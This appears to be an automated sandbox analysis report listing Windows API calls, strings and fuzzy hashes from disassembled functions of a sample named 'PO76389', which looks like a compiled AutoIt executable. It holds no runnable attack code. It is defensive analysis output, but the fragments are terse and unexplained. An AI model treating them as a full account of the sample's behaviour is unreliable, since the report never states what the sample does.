                                                    • GetMenuItemID.USER32(?,?), ref: 0051840B
                                                    • GetSubMenu.USER32(?,?), ref: 00518419
                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 0051846A
                                                    Similarity
                                                    • API ID: Menu$Item$CountMessagePostString
                                                    • String ID:
                                                    • API String ID: 650687236-0
                                                    • Opcode ID: 776a12a8760ae7d513aa867494721d0616b810f38b90441778e079b9826e1047
                                                    • Instruction ID: ebf9cd61160008367a40abc72893217cb465169dd76540bb35cdd9e62a3a6427
                                                    • Opcode Fuzzy Hash: 776a12a8760ae7d513aa867494721d0616b810f38b90441778e079b9826e1047
                                                    • Instruction Fuzzy Hash: 3A51AD71A00215AFDF11EF65C841AEEBBF4FF48714F14445AE911BB351CB74AE418BA4
                                                    APIs
                                                    • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00509409
                                                    • WSAGetLastError.WS2_32(00000000), ref: 00509416
                                                    • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 0050943A
                                                    • _strlen.LIBCMT ref: 00509484
                                                    • _memmove.LIBCMT ref: 005094CA
                                                    • WSAGetLastError.WS2_32(00000000), ref: 005094F7
                                                    Similarity
                                                    • API ID: ErrorLast$_memmove_strlenselect
                                                    • String ID:
                                                    • API String ID: 2795762555-0
                                                    • Opcode ID: f32e6968a75d1aa439906944729004a7eb322dd64025741041ae0c897f88ee26
                                                    • Instruction ID: fbf90154d12eedcd990d4b7608ed1a090781aa1ae6fed43b5e471f0803425d0d
                                                    • Opcode Fuzzy Hash: f32e6968a75d1aa439906944729004a7eb322dd64025741041ae0c897f88ee26
                                                    • Instruction Fuzzy Hash: C441AE75500208AFCB04EB65CC85EEEBBB9FF48314F10816AF516972D2DB34AE05CB60
                                                    APIs
                                                    • _memset.LIBCMT ref: 004F552E
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004F5579
                                                    • IsMenu.USER32(00000000), ref: 004F5599
                                                    • CreatePopupMenu.USER32 ref: 004F55CD
                                                    • GetMenuItemCount.USER32(000000FF), ref: 004F562B
                                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 004F565C
                                                    Similarity
                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                    • String ID:
                                                    • API String ID: 3311875123-0
                                                    • Opcode ID: c71b744620609d3d18917bfbc01069b0a32ff7fa089c8aa5060d3f749afc0c19
                                                    • Instruction ID: 28ba749e939a594dd7fb44ad7c88e1317dae7c14718c3971afe725b0ab9dca8f
                                                    • Opcode Fuzzy Hash: c71b744620609d3d18917bfbc01069b0a32ff7fa089c8aa5060d3f749afc0c19
                                                    • Instruction Fuzzy Hash: 1251B070600A0DABEF10CF68D888BBEBBF5AF15318F50411AE729DA290D7789945CB59
                                                    APIs
                                                      • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 004CB1C1
                                                    • GetWindowRect.USER32(?,?), ref: 004CB225
                                                    • ScreenToClient.USER32(?,?), ref: 004CB242
                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 004CB253
                                                    • EndPaint.USER32(?,?), ref: 004CB29D
                                                    Similarity
                                                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                    • String ID:
                                                    • API String ID: 1827037458-0
                                                    • Opcode ID: 6676ec77fe4bc21e51be4596f6b1c3508e87bdee7c942656d159191fbc4a1b9f
                                                    • Instruction ID: 7874a76e0149a7acf3b9d3705c23edc4bf370fe3c2a296813cec8d099864fdb3
                                                    • Opcode Fuzzy Hash: 6676ec77fe4bc21e51be4596f6b1c3508e87bdee7c942656d159191fbc4a1b9f
                                                    • Instruction Fuzzy Hash: 6641E2741006009FC711DF28EC89F6A3BF8FF59364F04056DF9A9872A1C7359849EBA6
                                                    APIs
                                                    • ShowWindow.USER32(00571810,00000000,?,?,00571810,00571810,?,0052E2D6), ref: 0051E21B
                                                    • EnableWindow.USER32(00000000,00000000), ref: 0051E23F
                                                    • ShowWindow.USER32(00571810,00000000,?,?,00571810,00571810,?,0052E2D6), ref: 0051E29F
                                                    • ShowWindow.USER32(00000000,00000004,?,?,00571810,00571810,?,0052E2D6), ref: 0051E2B1
                                                    • EnableWindow.USER32(00000000,00000001), ref: 0051E2D5
                                                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0051E2F8
                                                    Similarity
                                                    • API ID: Window$Show$Enable$MessageSend
                                                    • String ID:
                                                    • API String ID: 642888154-0
                                                    • Opcode ID: 5228377e015edea38973caa90c75da993e6daf3ce14082394c5fa14aa6895d98
                                                    • Instruction ID: 3546bf9686f9a80ed057385eb56ef19f2a00f5fb75e37e63064e60d5eb63e8fa
                                                    • Opcode Fuzzy Hash: 5228377e015edea38973caa90c75da993e6daf3ce14082394c5fa14aa6895d98
                                                    • Instruction Fuzzy Hash: F5412F38600141EFEB26CF54C4AABD47FF5BB06314F1841B9EE698F6A2C771A885CB51
                                                    APIs
                                                      • Part of subcall function 004CB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 004CB5EB
                                                      • Part of subcall function 004CB58B: SelectObject.GDI32(?,00000000), ref: 004CB5FA
                                                      • Part of subcall function 004CB58B: BeginPath.GDI32(?), ref: 004CB611
                                                      • Part of subcall function 004CB58B: SelectObject.GDI32(?,00000000), ref: 004CB63B
                                                    • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0051E9F2
                                                    • LineTo.GDI32(00000000,00000003,?), ref: 0051EA06
                                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0051EA14
                                                    • LineTo.GDI32(00000000,00000000,?), ref: 0051EA24
                                                    • EndPath.GDI32(00000000), ref: 0051EA34
                                                    • StrokePath.GDI32(00000000), ref: 0051EA44
                                                    Similarity
                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                    • String ID:
                                                    • API String ID: 43455801-0
                                                    • Opcode ID: d2593965ad0bf725c7f0d93b00a092b1bda49bf17d41e4cd17d2ffcfc71d2507
                                                    • Instruction ID: 643d328a20b7ec3427f02f8ae0288b23a10ba5844ff61633ec2c23deef71cbc5
                                                    • Opcode Fuzzy Hash: d2593965ad0bf725c7f0d93b00a092b1bda49bf17d41e4cd17d2ffcfc71d2507
                                                    • Instruction Fuzzy Hash: C711FA76000149BFEB059F94EC88E9A7FBDEB14354F048011FE0945160D7719D99EBA0
                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 004EEFB6
                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 004EEFC7
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004EEFCE
                                                    • ReleaseDC.USER32(00000000,00000000), ref: 004EEFD6
                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 004EEFED
                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 004EEFFF
                                                      • Part of subcall function 004EA83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,004EA79D,00000000,00000000,?,004EAB73), ref: 004EB2CA
                                                    Similarity
                                                    • API ID: CapsDevice$ExceptionRaiseRelease
                                                    • String ID:
                                                    • API String ID: 603618608-0
                                                    • Opcode ID: 4481edb820f0e669826e43e9f96b20f4a0e4fbc5a0d29324cf7fedd427e6b3a4
                                                    • Instruction ID: 60e54d41d131b86f2eb7ef45a516b6905322ce6bbbdaa560f3ce4554bb406440
                                                    • Opcode Fuzzy Hash: 4481edb820f0e669826e43e9f96b20f4a0e4fbc5a0d29324cf7fedd427e6b3a4
                                                    • Instruction Fuzzy Hash: 1901A775A00345BFEB109BA69C49B5EBFB8EB48751F004066FE08AB380D6709C04DF61
                                                    APIs
                                                    • __init_pointers.LIBCMT ref: 004D87D7
                                                      • Part of subcall function 004D1E5A: __initp_misc_winsig.LIBCMT ref: 004D1E7E
                                                      • Part of subcall function 004D1E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004D8BE1
                                                      • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004D8BF5
                                                      • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004D8C08
                                                      • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004D8C1B
                                                      • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004D8C2E
                                                      • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 004D8C41
                                                      • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 004D8C54
                                                      • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 004D8C67
                                                      • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 004D8C7A
                                                      • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 004D8C8D
                                                      • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 004D8CA0
                                                      • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 004D8CB3
                                                      • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004D8CC6
                                                      • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004D8CD9
                                                      • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004D8CEC
                                                      • Part of subcall function 004D1E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 004D8CFF
                                                    • __mtinitlocks.LIBCMT ref: 004D87DC
                                                      • Part of subcall function 004D8AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(0056AC68,00000FA0,?,?,004D87E1,004D6AFA,005667D8,00000014), ref: 004D8AD1
                                                    • __mtterm.LIBCMT ref: 004D87E5
                                                      • Part of subcall function 004D884D: RtlDeleteCriticalSection.NTDLL(00000000), ref: 004D89CF
                                                      • Part of subcall function 004D884D: _free.LIBCMT ref: 004D89D6
                                                      • Part of subcall function 004D884D: RtlDeleteCriticalSection.NTDLL(0056AC68), ref: 004D89F8
                                                    • __calloc_crt.LIBCMT ref: 004D880A
                                                    • GetCurrentThreadId.KERNEL32 ref: 004D8833
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                    • String ID:
                                                    • API String ID: 2942034483-0
                                                    • Opcode ID: f9cb3653ee175faf567ea2c99537766e9cb29bc504c808c6f5fe7be080a290f4
                                                    • Instruction ID: 47d3f3caf5185a32e243b615c5a570ff0fd4230a1330d7313abbb475acc47f66
                                                    • Opcode Fuzzy Hash: f9cb3653ee175faf567ea2c99537766e9cb29bc504c808c6f5fe7be080a290f4
                                                    • Instruction Fuzzy Hash: FBF090321197115AE664773E7C27A7B26D18F01778B600A2FF460D63E2FF588841556C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                    • String ID:
                                                    • API String ID: 1423608774-0
                                                    • Opcode ID: cc3c6f4330e36a12422ea5860b5c39d37db96bc74a80d7b447c7a0fe57bc644a
                                                    • Instruction ID: e5af3f3d1eccd9252beb3514e50087bb7a147719f5f28b53d674b444643fd806
                                                    • Opcode Fuzzy Hash: cc3c6f4330e36a12422ea5860b5c39d37db96bc74a80d7b447c7a0fe57bc644a
                                                    • Instruction Fuzzy Hash: 3F01F9761012159BD7152B54FC48DFBB776FF59301700052AFA0792260CB74AC14DB61
                                                    APIs
                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 004B1898
                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 004B18A0
                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004B18AB
                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004B18B6
                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 004B18BE
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 004B18C6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Virtual
                                                    • String ID:
                                                    • API String ID: 4278518827-0
                                                    • Opcode ID: 37449b365679fb0926d64a34477de70dd44fc7e06fe03c2ce4daff86b50149f8
                                                    • Instruction ID: dab4e6bba6ad073db6e0bc42772693b029317f766cc0b456d81076a8fd9c5155
                                                    • Opcode Fuzzy Hash: 37449b365679fb0926d64a34477de70dd44fc7e06fe03c2ce4daff86b50149f8
                                                    • Instruction Fuzzy Hash: 09016CB0901B597DE3008F6A8C85B52FFB8FF15354F04411B915C47A41C7F5A864CBE5
                                                    APIs
                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004F8504
                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 004F851A
                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 004F8529
                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004F8538
                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004F8542
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004F8549
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                    • String ID:
                                                    • API String ID: 839392675-0
                                                    • Opcode ID: 070704dd32d6ba8fb764eb252cfeba4192b03965df8cfbe03078d2f69277066f
                                                    • Instruction ID: 29225a68037304532811a78286e30ed20094f5348ed589a5a37894d160535df9
                                                    • Opcode Fuzzy Hash: 070704dd32d6ba8fb764eb252cfeba4192b03965df8cfbe03078d2f69277066f
                                                    • Instruction Fuzzy Hash: DFF0BE32200158BBE7201B62AC0EEEF7E7CDFE6B11F000018FA01D1250EBA06A09E6B4
                                                    APIs
                                                    • InterlockedExchange.KERNEL32(?,?), ref: 004FA330
                                                    • RtlEnterCriticalSection.NTDLL(?), ref: 004FA341
                                                    • TerminateThread.KERNEL32(?,000001F6,?,?,?,005266D3,?,?,?,?,?,004BE681), ref: 004FA34E
                                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,005266D3,?,?,?,?,?,004BE681), ref: 004FA35B
                                                      • Part of subcall function 004F9CCE: CloseHandle.KERNEL32(?,?,004FA368,?,?,?,005266D3,?,?,?,?,?,004BE681), ref: 004F9CD8
                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 004FA36E
                                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 004FA375
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                    • String ID:
                                                    • API String ID: 3495660284-0
                                                    • Opcode ID: b3fa0926ba233c8f6cbdfb06915a4bfc87635ccb0f2e19dc67f1af1da76d21cb
                                                    • Instruction ID: 2413207ee8637f8336f16a36bee479fd485180b67c327739f2c98a5271fdeaf3
                                                    • Opcode Fuzzy Hash: b3fa0926ba233c8f6cbdfb06915a4bfc87635ccb0f2e19dc67f1af1da76d21cb
                                                    • Instruction Fuzzy Hash: 5BF08976145215ABD3112B64FD4CDEBB77BFF55301B000521FA03912A1CB755815EB71
                                                    APIs
                                                    • _memmove.LIBCMT ref: 004BC419
                                                    • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,004F6653,?,?,00000000), ref: 004BC495
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: FileRead_memmove
                                                    • String ID: SfO
                                                    • API String ID: 1325644223-1149229531
                                                    • Opcode ID: ab8443c22366b1d2684d3e5e5e6d961070f8e935a466c35f4ead9f7a762bb80f
                                                    • Instruction ID: f13fd6abbf2022f4faf713f41a20b1db4ebce1c94d5b51575a03521906de8a94
                                                    • Opcode Fuzzy Hash: ab8443c22366b1d2684d3e5e5e6d961070f8e935a466c35f4ead9f7a762bb80f
                                                    • Instruction Fuzzy Hash: 47A1CE70A04619EBDB00CF59D8C0BAAFBB0FF05300F14C59AE8659B381D739D965DBA5
                                                    APIs
                                                      • Part of subcall function 004D010A: std::exception::exception.LIBCMT ref: 004D013E
                                                      • Part of subcall function 004D010A: __CxxThrowException@8.LIBCMT ref: 004D0153
                                                      • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                      • Part of subcall function 004BBBD9: _memmove.LIBCMT ref: 004BBC33
                                                    • __swprintf.LIBCMT ref: 004CD98F
                                                    Strings
                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 004CD832
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                    • API String ID: 1943609520-557222456
                                                    • Opcode ID: 66e439e48895b150b64c63075ef4f1dfc03ef1422df0d67dcb8f66ef96b2a4f6
                                                    • Instruction ID: e107f787fe5b47c558d8005ff6e03de02e0fa0af6a2107b762cb30b3f504bc67
                                                    • Opcode Fuzzy Hash: 66e439e48895b150b64c63075ef4f1dfc03ef1422df0d67dcb8f66ef96b2a4f6
                                                    • Instruction Fuzzy Hash: BF919E75508211AFC754EF25D881DAEBBB4FF85704F00092EF496972A1EB38ED05CB6A
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 0050B4A8
                                                    • CharUpperBuffW.USER32(?,?), ref: 0050B5B7
                                                    • VariantClear.OLEAUT32(?), ref: 0050B73A
                                                      • Part of subcall function 004FA6F6: VariantInit.OLEAUT32(00000000), ref: 004FA736
                                                      • Part of subcall function 004FA6F6: VariantCopy.OLEAUT32(?,?), ref: 004FA73F
                                                      • Part of subcall function 004FA6F6: VariantClear.OLEAUT32(?), ref: 004FA74B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                    • API String ID: 4237274167-1221869570
                                                    • Opcode ID: 4ca0b44bdb90ab12a53c3f127b0f1e90e171d319f182bec04d4d2747e76b2c1b
                                                    • Instruction ID: 44f2ed44509efe4cec79acdf4137cab55e9d2451f82f8675e6fe2cce65e39033
                                                    • Opcode Fuzzy Hash: 4ca0b44bdb90ab12a53c3f127b0f1e90e171d319f182bec04d4d2747e76b2c1b
                                                    • Instruction Fuzzy Hash: EA9159746043019FCB10DF25C484A5ABBF4BF89704F14496EF88A9B391EB35E945CB62
                                                    APIs
                                                      • Part of subcall function 004B3BCF: _wcscpy.LIBCMT ref: 004B3BF2
                                                    • _memset.LIBCMT ref: 004F5E56
                                                    • GetMenuItemInfoW.USER32(?), ref: 004F5E85
                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004F5F31
                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 004F5F5B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                    • String ID: 0
                                                    • API String ID: 4152858687-4108050209
                                                    • Opcode ID: de0dbe5d9f8b794e60b113aca646148dd89679d984d5ee75d6c7f0eceec96780
                                                    • Instruction ID: 6fff779fb20fdde316156a9e73501f57fea48bdd1aa141f9aa4e063f1eb6c07b
                                                    • Opcode Fuzzy Hash: de0dbe5d9f8b794e60b113aca646148dd89679d984d5ee75d6c7f0eceec96780
                                                    • Instruction Fuzzy Hash: 8F510331518B099BD3149B28D8446BBB7E4EF85314F08062FFB95D32D1DB78CD0587AA
                                                    APIs
                                                    • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 004F10B8
                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 004F10EE
                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 004F10FF
                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 004F1181
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
